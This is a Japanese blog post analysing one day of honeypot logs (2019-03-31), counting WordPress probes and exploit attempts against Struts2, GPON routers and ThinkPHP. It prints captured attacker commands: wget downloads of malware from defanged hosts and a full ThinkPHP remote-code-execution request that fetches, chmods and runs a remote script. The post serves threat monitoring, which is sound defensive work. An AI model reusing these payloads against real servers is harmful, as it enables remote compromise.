S-Owl

S(ecurity)Owl

ハニーポットのログ分析(2019/03/31)

WOWhoneypotの2019/03/31(日) (運用297日目)の簡易分析です。
本日の総アクセス件数は46件です。送信元IP数は28IPです。
本日の主なアクセスは以下です。

WordPressの調査:18 件
Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃:4 件
・ GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃:2 件
・ ThinkPHPの脆弱性を突いた攻撃:1 件

本日のドメイン名でのアクセスは以下です。

3 GET /
1 HEAD /
1 GET /robots.txt

本日のハンティングログは以下です。1つ目はThinkPHP、それ以外はStruts2によるものです。

1 2019-03-31 wget hxxp://82.212.70[.]218/a_thk.sh
1 2019-03-31 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
1 2019-03-31 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 2019-03-31 wget -c hxxp://103.55.13[.]68:13333/Linux.TF

以下が全アクセスログです。

件数 日付 種別 リクエス
19 2019/3/31 アクセス GET /
4 2019/3/31 Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃 GET /index.action
2 2019/3/31 GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 POST /GponForm/diag_Form?style/
2 2019/3/31 WordPressの調査 GET /news/wp-login.php
2 2019/3/31 WordPressの調査 GET /news//wp-json/wp/v2/users/
2 2019/3/31 WordPressの調査 GET /news//?author=1
2 2019/3/31 WordPressの調査 GET /blog3/wp-login.php
2 2019/3/31 WordPressの調査 GET /blog3//wp-json/wp/v2/users/
2 2019/3/31 WordPressの調査 GET /blog3//?author=1
2 2019/3/31 WordPressの調査 GET /blog2/wp-login.php
2 2019/3/31 WordPressの調査 GET /blog2//wp-json/wp/v2/users/
2 2019/3/31 WordPressの調査 GET /blog2//?author=1
1 2019/3/31 調査 HEAD /
1 2019/3/31 クローリング GET /robots.txt
1 2019/3/31 ThinkPHPの脆弱性を突いた攻撃 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=wget%20hxxp://82.212.70.218/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;

以上です。